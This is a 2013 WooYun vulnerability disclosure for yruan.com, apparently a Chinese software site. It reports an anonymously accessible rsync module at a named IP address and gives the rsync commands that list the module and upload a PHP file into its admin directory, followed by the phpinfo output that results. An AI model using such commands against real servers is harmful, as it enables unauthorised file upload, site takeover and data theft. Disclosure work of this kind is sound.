当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041258

漏洞标题:亿软网系统配置不当导致数据外泄且可以上传任意文件

相关厂商:yruan.com

漏洞作者: 盈盈无绪

提交时间:2013-10-30 10:06

修复时间:2013-12-14 10:07

公开时间:2013-12-14 10:07

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-30: 细节已通知厂商并且等待厂商处理中
2013-10-30: 厂商已经确认,细节仅向厂商公开
2013-11-09: 细节向核心白帽子及相关领域专家公开
2013-11-19: 细节向普通白帽子公开
2013-11-29: 细节向实习白帽子公开
2013-12-14: 细节向公众公开

简要描述:

yruan.com 亿软网系统配置不当导致数据外泄且可以上传任意文件

详细说明:

rsync 211.154.149.109::yruan


rsync env.php 211.154.149.109::yruan/admin/


访问 http://g.yruan.com/env.php

PHP Logo
PHP Version 5.2.11
System	Linux paogame 2.6.18-164.el5 #1 SMP Thu Sep 3 03:33:56 EDT 2009 i686
Build Date	Jan 30 2010 12:16:15
Configure Command	 './configure' '--prefix=/usr/local/php5211' '--with-config-file-path=/usr/local/php5211/etc' '--with-mysql=/usr/local/mysql' '--with-mysqli=/usr/local/mysql/bin/mysql_config' '--with-mysql-sock=/tmp/mysql.sock' '--with-iconv-dir=/usr/local' '--with-freetype-dir' '--with-jpeg-dir' '--with-png-dir' '--with-gd' '--with-zlib' '--with-libxml-dir=/usr/local/libxml2' '--enable-xml' '--disable-rpath' '--enable-discard-path' '--enable-safe-mode' '--enable-bcmath' '--enable-shmop' '--enable-sysvsem' '--enable-inline-optimization' '--with-curl=/usr/local' '--with-curlwrappers' '--enable-mbregex' '--enable-fastcgi' '--enable-fpm' '--enable-force-cgi-redirect' '--enable-mbstring' '--with-mcrypt' '--enable-gd-native-ttf' '--with-openssl' '--with-mhash' '--enable-pcntl' '--enable-sockets' '--with-xmlrpc' '--enable-zip' '--enable-soap' '--without-pear' '--enable-ftp' '--enable-pdo_mysql' '--enable-snmp'

漏洞证明:

yruan.png


修复方案:

你们懂得

版权声明:转载请注明来源 盈盈无绪@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-10-30 10:22

厂商回复:

文件同步开启有问题,感谢提交

最新状态:

暂无